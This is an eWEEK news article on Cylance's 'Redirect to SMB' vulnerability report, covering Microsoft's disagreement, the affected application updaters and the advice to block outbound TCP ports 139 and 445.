Redirect to SMB Attack Can Exploit Windows Users, Report Finds

Microsoft, however, denies security vendor Cylance's claims that there is in fact a new attack type.

Windows exploit

Security vendor Cylance today is warning of a potential vulnerability that enables an attacker to use the Server Message Block (SMB) protocol to exploit Windows users and applications. Microsoft, however, is downplaying the risk and doesn't entirely agree with Cylance's assessment of the issue.

Cylance worked with CERT to properly disclose and report the flaw to Microsoft and other impacted application vendors.

"Many software products use HTTP requests for various features such as software update checking," CERT warns in its advisory. "A malicious user can intercept such requests (such as with a MITM proxy) and use HTTP Redirect to redirect the victim [to] a malicious SMB server."

CERT notes in its advisory that it is unaware of a complete solution to the problem, though there are workarounds that limit risk.

Microsoft doesn't consider the Redirect to SMB issue to be a new risk. "We don’t agree with Cylance's claims of a new attack type," a Microsoft spokesperson wrote in an email to eWEEK. "Several factors would need to come together for this type of cyber attack to work, such as success in luring a person to enter information into a fake website. We encourage people to avoid opening links in emails from senders that they don't recognize or visiting unsecure sites."

Brian Wallace, senior researcher at Cylance, does consider the Redirect to SMB to be a big issue. The Redirect to SMB attack builds on an attack first discussed in 1997 that could enable an attacker to click on a link that would force the user to connect to a remote SMB server, he said.

"By default, when Windows connects out to an SMB Windows file server, Window will attempt to authenticate," Wallace told eWEEK. "This new Redirect to SMB issue builds on that by allowing applications that connect over HTTP to be redirected to SMB that could potentially be malicious."

In the original 1997 issue, according to Wallace, Internet Explorer was required to be used to view a Web page that might then lead the user to a malicious SMB server. With the Redirect to SMB attack, application updating mechanisms are also at risk. In some limited testing, Wallace found that at least 30 applications were potentially vulnerable to a Redirect to SMB attack, including the Apple updater for iTunes and Adobe's updater for Reader.

SMB Windows file server capabilities can also be enabled on non-Windows systems. The open-source Samba file server runs SMB and could potentially be used in some form of Redirect to SMB attack. That said, Wallace explained that a Linux desktop user connecting to a Samba server would not be at risk, while a Windows desktop user connecting to Samba would be. The difference is how tightly coupled SMB services are within the operating system.

"Microsoft has included SMB in the core of Windows networking, while SMB is not directly integrated into the Linux kernel," he said.

Wallace did say there are a few simple steps users can take to reduce the risk of being exploited in a Redirect to SMB attack. The simplest step is to block TCP port 139 and 445 from going outside of the network.

"There are also risks inside of the network, but allowing those two ports outbound on a network is dangerous," he said.

Sean Michael Kerner is a senior editor at eWEEK and Follow him on Twitter @TechJournalist.

Sean Michael Kerner

Sean Michael Kerner

Sean Michael Kerner is an Internet consultant, strategist, and contributor to several leading IT business web sites.